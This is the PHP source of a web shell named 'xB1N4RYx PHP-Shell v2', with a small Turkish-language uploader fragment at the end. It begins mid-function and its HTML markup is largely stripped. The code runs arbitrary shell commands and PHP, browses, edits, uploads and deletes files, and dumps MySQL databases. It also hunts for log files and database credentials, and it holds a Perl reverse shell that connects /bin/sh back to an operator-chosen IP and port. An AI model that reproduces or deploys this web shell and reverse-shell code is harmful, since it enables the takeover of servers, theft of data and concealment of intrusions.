addFile($src . '/' . $file,substr($src . '/' . $file,$path_length)); } } } closedir($dir); } function compress($src, $xX) { if(substr($src,-1)==='/'){$src=substr($src,0,-1);} $arr_src=explode('/',$src); $filename=$src; unset($arr_src[count($arr_src)-1]); $path_length=strlen(implode('/',$arr_src).'/'); $f=explode('.',$filename); $filename=$f[0]; $filename=(($filename=='')? $xX : $xX); $zip = new ZipArchive; $res = $zip->open($filename, ZipArchive::CREATE); if($res !== TRUE){ echo 'Error: Unable to create zip file'; exit;} if(is_file($src)){$zip->addFile($src,substr($src,$path_length));} else{ if(!is_dir($src)){ $zip->close(); @unlink($filename); echo 'Error: File not found'; exit;} recurse_zip($src,$zip,$path_length);} $zip->close(); //exit; } function get_string_between($string, $start, $end){ $string = " ".$string; $ini = strpos($string,$start); if ($ini == 0) return ""; $ini += strlen($start); $len = strpos($string,$end,$ini) - $ini; return substr($string,$ini,$len); } function func_enabled($func){ $disabled = explode(',', ini_get('disable_functions')); foreach ($disabled as $dis){ if($dis == $func) return false; } return true; } function binary_shell($cmd){ if(func_enabled("shell_exec")) return shell_exec($cmd); else if(func_enabled("exec")) return exec($cmd); else if(func_enabled("system")) return system($cmd); else if(func_enabled("passthru")) return passthru($cmd); } function fExt($filename) { $path_info = pathinfo($filename); return $path_info['extension']; } $images = array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff"); $movies = array("avi","mpg","mpeg"); $user = $_POST['zun']; $pass = hash("sha512", $_POST['zpw']); $pazz = $p; if($_SESSION['zusrn'] != $u || $_SESSION['zpass'] != $pazz) { $_SESSION['zusrn'] = $user; $_SESSION['zpass'] = $pass; } if($_GET['page'] == "phpinfo"){ if($_SESSION['zusrn'] == $u && $_SESSION['zpass'] == $pazz){ echo 'xB1N4RYx'; phpinfo(); return;} } echo ' xB1N4RYx '; function endsWith($haystack, $needle) { $length = strlen($needle); $start = $length * -1; //negative return (substr($haystack, $start) === $needle); } if(endsWith($_GET['dir'], "\\")){ $dslash = ""; } else{ $dslash = "/"; } if(endsWith(realpath($_SESSION['current_folder']), "/") || endsWith(realpath($_SESSION['current_folder']), "\\")){ $cslash = ""; } else{ $cslash = "/"; } if($_GET['page'] == "list"){ if(!isset($_SESSION['current_folder'])){ $_SESSION['current_folder'] = "./"; } else{ if(is_dir(realpath($_SESSION['current_folder']).$cslash.$_GET['dir'])) $_SESSION['current_folder'] = realpath($_SESSION['current_folder']).$cslash.$_GET['dir']; } } echo '
Software: 
OS: 
User: 
PHP Version: 
MySQL Version: 
Server IP: 
Safemode: 
Disabled Funcs: 
Disk Info: 
Current Folder: 
Shell Folder: 
'; $ts = disk_total_space("/")/1024/1024/1024;// IN GB $fs = disk_free_space("/")/1024/1024/1024;// IN GB $soft = str_replace("PHP/".phpversion()."", "", getenv("server_software")); echo $soft.'
'; echo wordwrap(php_uname(),90," ",1).'
'; echo binary_shell("id").'
'; echo phpversion().'
'; echo mysql_get_client_info().'
'; echo getenv("server_name").' / '.gethostbyname(getenv("server_name")).'
'; if (strtolower(@ini_get("safe_mode")) == "on" || @ini_get("safe_mode") == true) { echo 'On
'; } else{ echo 'Off
'; } if(@ini_get("disable_functions") == "") echo "None
"; else echo ''.@ini_get("disable_functions").'
'; echo round($fs, 2).' GB Free'.' of Total '.round($ts, 2).' GB'.' ('.round(100/($ts/$fs), 2).'%)
'; if(preg_match("/\//i", realpath($_SESSION['current_folder']))){ $cpaths = explode('/', realpath($_SESSION['current_folder'])); $pathslash = '/'; } else{ $cpaths = explode('\\', realpath($_SESSION['current_folder'])); $pathslash = '\\'; } echo '
'; $asdAsD = 0; foreach($cpaths as $paths){ $buffer .= $paths.$pathslash; if($asdAsD <= count($cpaths)-2){ echo ''.$paths.''.$pathslash.''; } else{ echo ''.$paths.''; } $asdAsD++; } echo '
'; //'.realpath($_SESSION['current_folder']).' //echo '
'; //echo ''.realpath($_SESSION['current_folder']).'
'; //echo ''; echo ''.realpath("./").'
'; echo '
'; echo 'Your IP: '.getenv("remote_addr").''; if($_SESSION['zusrn'] == $u && $_SESSION['zpass'] == $pazz) echo '
Logout'; if(isset($_SESSION['muser'])) echo '
MySQL Logout'; echo '

'; echo '
'; echo '
'; break; case "logout": session_destroy(); echo ''; break; case "mylogout": unset($_SESSION['mhost']); unset($_SESSION['mport']); unset($_SESSION['muser']); unset($_SESSION['mpass']); unset($_SESSION['mlog']); echo ''; break; case "go": $goto = $_GET['goto']; if(!isset($goto)){ echo ''; echo '
'; echo ''; } else{ $_SESSION["current_folder"] = $goto; echo ''; } break; case "cf": $ff = $_POST['fc']; $f = realpath($_SESSION['current_folder'])."/".$ff; echo '
'; if(isset($ff)){ if(file_exists($f)){ echo 'File Already Exists!'; } else{ echo 'Done!'; $fo = @fopen($f, "w"); fwrite($fo, "File Created By xB1N4RYx PHP-Shell v2"); fclose($fo); } } echo '
Create File'; echo '
'; echo '
'; echo ''; echo '
'; break; case "df": $ff = $_GET['f']; $f = realpath($_SESSION['current_folder'])."/".$ff; echo '
'; if(isset($ff)){ if(file_exists($f)){ unlink($f); echo 'Done!'; } else{ echo 'File Doesnt Exist!'; } } echo '
Delete File'; echo '
'; echo '
'; echo ''; echo '
'; if(!isset($_GET['noredirect'])) echo ''; break; case "cfo": $ff = $_POST['fco']; $f = realpath($_SESSION['current_folder'])."/".$ff; echo '
'; if(isset($ff)){ if(file_exists($f)){ echo 'Folder Already Exists!'; } else{ echo 'Done!'; mkdir($f, 0777); } } echo '
Create Folder'; echo '
'; echo '
'; echo ''; echo '
'; break; case "dfo": $ff = $_GET['f']; $f = realpath($_SESSION['current_folder'])."/".$ff; echo '
'; if(isset($ff)){ if(!file_exists($f)){ echo 'Folder Doesnt Exist!'; } else{ echo 'Done!'; rmdir($f); } } echo ''; break; case "php": $phpc = $_POST['phpc']; echo '
PHP Code Execution

Result


'; echo '
'; echo 'Code
'; echo '
'; break; case "mysql": $host = $_POST['host']; $port = $_POST['port']; $user = $_POST['user']; $pass = $_POST['pass']; if(!isset($_SESSION['muser'])){ echo '
'; echo '
'; echo 'Host:


'; echo 'Port:


'; echo 'User:


'; echo 'Password:


'; echo '
'; echo '
'; echo '
';} // else{ if(isset($user)){ $_SESSION['mhost'] = $host; $_SESSION['mport'] = $port; $_SESSION['muser'] = $user; $_SESSION['mpass'] = $pass;} if(isset($_SESSION['muser'])){ $l = mysql_connect($_SESSION['mhost'].":".$_SESSION['mport'], $_SESSION['muser'], $_SESSION['mpass']); if(!$l){ unset($_SESSION['mhost']); unset($_SESSION['mport']); unset($_SESSION['muser']); unset($_SESSION['mpass']); unset($_SESSION['mlog']); die("Can't Connect To MySQL"); } if($_SESSION['mlog'] < 1) echo ''; $_SESSION['mlog'] = 1; } // } if(isset($_SESSION['muser'])){ //if(!isset($_GET['db']) && isset($_POST['user'])){ $dbs = mysql_query("SHOW DATABASES"); echo '
'; if($_SESSION['zusrn'] != $u || $_SESSION['zpass'] != $pazz) { echo '
'; echo '
'; echo 'xB1N4RYx PHP-Shell v2

'; echo 'Username:


'; echo 'Password:

'; echo '
'; echo '
'; echo '
'; echo '
'; return; } function fsize($file){ if(filesize($file) == 0) return "~"; if(filesize($file) < 0) return "2 GB+"; if(round(filesize($file)/1024/1024, 1) >= 1024) return round(filesize($file)/1024/1024/1024, 1)." GB"; if(round(filesize($file)/1024, 1) >= 1024) return round(filesize($file)/1024/1024, 1)." MB"; return round(filesize($file)/1024, 1)." KB"; } switch($_GET['page']){ default: echo '
xB1N4RYx PHP-Shell v2
'; break; case "findlogs": $fi = fopen("log.pl","w"); fwrite($fi,'system("cd '.realpath($_SESSION['current_folder']).' && find | xargs grep \'".$ARGV[0]."\'");'); fclose($fi); $sh = binary_shell("perl log.pl ".getenv("remote_addr")); $files = explode("\r\n",$sh); echo "
Possible log files:

"; foreach($files as $file){ $f = get_string_between($file,"/",":"); $fa = '/'.get_string_between($file,"/","No such file"); if($f != "") echo str_replace("//","/",realpath($_SESSION['current_folder']).'/'.$f)."
"; } echo "
"; unlink("log.pl"); break; case "findmysql": $fi = fopen("sql.pl","w"); fwrite($fi,'system("cd '.realpath($_SESSION['current_folder']).' && find | xargs grep \'".$ARGV[0]."\'");'); fclose($fi); $sh = binary_shell("perl sql.pl mysql_connect"); $files = explode("\r\n",$sh); echo "
Possible mysql password files:

"; foreach($files as $file){ $f = get_string_between($file,"/",":"); $fa = '/'.get_string_between($file,"/","No such file"); if($f != "") echo str_replace("//","/",realpath($_SESSION['current_folder']).'/'.$f)."
"; } echo "
"; unlink("sql.pl"); break; case "removelogs": break; case "list": $dir = @opendir($_SESSION['current_folder']); $xazz = 0; if(!$dir){ $_SESSION['current_folder'] = "./"; } echo ''; echo ''; while (($dirs = @readdir($dir)) != false){ $color = array("#000000","#111111","#444444"); if(is_dir(realpath($_SESSION['current_folder'])."/".$dirs) && $dirs != "." && $dirs != ".."){ if($xazz == 1) $xazz--; else $xazz++; echo ''; }} echo ''; $nondir = @opendir(realpath($_SESSION['current_folder'])); while (($files = @readdir($nondir)) != false){ if(!is_dir(realpath($_SESSION['current_folder'])."/".$files)){ if($xazz == 1) $xazz--; else $xazz++; echo ''; echo ''; echo ''; echo ''; }} closedir($dir); closedir($nondir); echo '
File Size
Extra Options
Permissions
Options
 
  
Download ~ Delete





'.fsize(realpath($_SESSION['current_folder']).$cslash.$files).'
'; if(is_executable(realpath($_SESSION['current_folder']).$cslash.$files)) echo '
Start ~ Kill
'; else echo ' '; $permissions = is_writeable($files); if($permissions == true) $perms = 'Editable'; else $perms = 'Locked'; echo '
'; echo '
'.$perms.'
'; echo '
Edit ~ Download ~ Delete
'; break; case "crypt": echo '
'; echo '
'; echo 'Input:


'; echo '
'; echo ''; echo '
'; echo '
'; echo '
'; echo '

md5

'; echo '

sha1

'; echo '

sha256

'; echo '

sha384

'; echo '

sha512

'; echo '
'; echo '
Decrypt SHA1/MD5 Hashes'; echo '
'; break; case "shell": $sh = binary_shell("cd ".realpath($_SESSION["current_folder"])." && ".$_POST['cmd']); echo '
'; echo ''; echo '
'; echo ''; echo ''; echo ''; break; case "view": $file = $_GET['file']; $fc = $_GET['fc']; if(!isset($fc)){ $fc = 0; } if(in_array(strtolower(fExt(realpath($_SESSION["current_folder"].$cslash.$file))), $images, true) && $fc != 1){ echo '
Viewing Image
[ '.$file.' ]
Download Image
'; break; } if(in_array(strtolower(fExt(realpath($_SESSION["current_folder"].$cslash.$file))), $movies, true) && $fc != 1){ echo '
'; break; } $fo = @fopen(realpath($_SESSION["current_folder"].$cslash.$file), "r"); $fr = @fread($fo, filesize(realpath($_SESSION["current_folder"].$cslash.$file))); echo '
'; echo '
Editing '.realpath($_SESSION["current_folder"].$cslash.$file).'
Highlight PHP

'; echo ''; echo ''; echo '
'; echo '
'; fclose($fo); break; case "saveedit": $fs = $_POST['file']; $fd = $_POST['ctext']; if (get_magic_quotes_gpc()){ if (!function_exists("strips")){ function strips(&$arr,$k=""){ if (is_array($arr)){ foreach($arr as $k=>$v){ if (strtoupper($k) != "GLOBALS"){ strips($arr["$k"]); } } } else{ $arr = stripslashes($arr); } } } strips($GLOBALS); } $fo = @fopen(realpath($_SESSION["current_folder"].$cslash.$fs), "w"); $fo2 = @fopen(realpath($_SESSION["current_folder"].$cslash.$fs), "r"); $fw = @fwrite($fo, $fd); $fr = @fread($fo2, filesize(realpath($_SESSION["current_folder"].$cslash.$fs))); echo '
'; echo '

Saved!

Editing '.realpath($_SESSION["current_folder"].$cslash.$fs).'
Highlight PHP

'; echo ''; echo ''; echo '
'; echo '
'; fclose($fo); fclose($fo2); break; case "highlight": $fil = $_GET['file']; $filz = realpath($_SESSION["current_folder"].$cslash.$fil); echo '
'; echo '
Highlighting '.realpath($_SESSION["current_folder"].$cslash.$fil).'
Edit'; echo '
'; $hl = highlight_file($filz, true); echo $hl; echo '
Databases:
'; echo ''; while ($row = mysql_fetch_assoc($dbs)) { echo ''; } echo '
'.$row['Database'] . 'Query
'; echo '
'; switch($_GET['a']) { default: echo ' 
'; break; case "tables": $db = $_GET['db']; echo 'Tables of '.$_GET['db'].'
'; $t = mysql_query("SHOW TABLES FROM ".$_GET['db']); while($tb = mysql_fetch_row($t)){ echo ''.$tb[0].'
'; } break; case "columns": echo 'Data of '.$_GET['table']." @ ".$_GET['db'].'
'; echo ''; $db = $_GET['db']; $t = $_GET['table']; mysql_select_db($db, $l); $c = mysql_query("SHOW COLUMNS FROM ".$t); while($cc = mysql_fetch_array($c)){ echo ''; } echo ''; $d = mysql_query("SELECT * FROM ".$t); while($dd = mysql_fetch_array($d)){ echo ''; for($i = 0; $i <= count($dd)/2-1; $i++){ echo ''; //echo ''; } echo ''; } echo ''; echo '
   '.$cc[0].'   
   '.$dd[$i].'   
'; break; case "query": $db = $_POST['pdb']; if(!isset($db)) $db = $_GET['db']; $q = $_POST['query']; if(isset($db)) echo 'Execute Query In '.$db.'
'; if(isset($q)){ mysql_select_db($db, $l); mysql_query(stripslashes($q)); echo 'Done!'; } echo '
'; echo ''; echo ''; echo '
'; echo '
'; break; } echo '
'; } break; case "ktask": $f = $_GET['f']; $win = binary_shell("taskkill /F /IM ".$f); $gpid = binary_shell("pidof ".$f); $linux = binary_shell("kill -9 ".$gpid); if(isset($win)) echo "
".$win."
"; else echo "
".$linux."
"; break; case "stask": $f = $_GET['f']; $folder = realpath($_SESSION['current_folder'])."/"; $win = binary_shell("cd ".$folder." && ".$f); $linux = binary_shell("cd ".$folder." && "."./".$f); if(isset($win)) echo "
".$win."
"; else echo "
".$linux."
"; break; case "downloadfile": $f = $_GET['f']; $file = realpath($_SESSION['current_folder'])."/".$f; if (file_exists($file)) { header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename='.$f); header('Content-Transfer-Encoding: binary'); header('Expires: 0'); header('Cache-Control: must-revalidate, post-check=0, pre-check=0'); header('Pragma: public'); header('Content-Length: ' . filesize($file)); ob_clean(); flush(); readfile($file); exit; /*header('Content-disposition: attachment; filename='.$f.''); header('Content-type: application/octet-stream'); ob_clean(); flush(); readfile($file);*/ } break; case "downloadzip": //echo ''; $f = $_GET['f']; $file = realpath($_SESSION['current_folder'])."/".$f; $fi = realpath("./".$f.'.zip'); compress($file, $f.'.zip'); header('Content-Description: File Transfer'); header('Content-Type: application/zip'); header('Content-Disposition: attachment; filename='.$f.'.zip'); header('Content-Transfer-Encoding: binary'); header('Expires: 0'); header('Cache-Control: must-revalidate, post-check=0, pre-check=0'); header('Pragma: public'); header('Content-Length: ' . filesize($fi)); ob_clean(); flush(); readfile($fi); exit; break; case "upload": echo '

'; echo 'Select File:

'; echo ''; echo '

Upload to:

'; echo '
'; break; case "dupload": $up = realpath($_POST['to'])."/".basename($_FILES['f']['name']); if(move_uploaded_file($_FILES['f']['tmp_name'], $up)) echo "Upload Successful!"; else echo "Upload Unsuccessful! :("; break; case "sr": echo '
Do you really want to remove this shell?
'; break; case "selfremove": unlink($_SERVER['SCRIPT_FILENAME']); echo ''; break; case "viewimage": $i = $_GET['i']; $v = realpath($_SESSION['current_folder']).$cslash.$i; /*echo $v; echo '
'; echo ''; echo '
';*/ header("Content-type: image/png"); ob_clean(); flush(); readfile($v); break; case "viewmovie": $i = $_GET['i']; $v = realpath($_SESSION['current_folder']).$cslash.$i; header("Content-type: video/quicktime"); ob_clean(); flush(); readfile($v); break; case "bcon": echo '
'; echo '
'; echo 'IP:


'; echo 'Port:
'; echo '
'; echo '
'; if(isset($_GET['ip']) && isset($_GET['port'])){ $ip = $_GET['ip']; $port = $_GET['port']; $bc = fopen("/tmp/bxcon.pl","w"); fwrite($bc,'#!/usr/bin/perl use Socket; $iaddr=inet_aton("'.$ip.'") || die("Error: $!\n"); $paddr=sockaddr_in("'.$port.'", $iaddr) || die("Error: $!\n"); $proto=getprotobyname("tcp"); socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n"); connect(SOCKET, $paddr) || die("Error: $!\n"); open(STDIN, ">&SOCKET"); open(STDOUT, ">&SOCKET"); open(STDERR, ">&SOCKET"); system("/bin/sh -i"); close(STDIN); close(STDOUT); close(STDERR);'); fclose($bc); shell_exec("perl /tmp/bxcon.pl"); unlink("/tmp/bxcon.pl"); } break; } echo '
xB1N4RYx ~ 2012

'; ?> Sw Bilgi

'.php_uname().'
'; echo '
'; echo '
'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Yuklendi

'; } else { echo 'Basarisiz

'; } } } $x = $_GET["x"]; Switch($x){ case "rooting"; rooting(); break; } ?>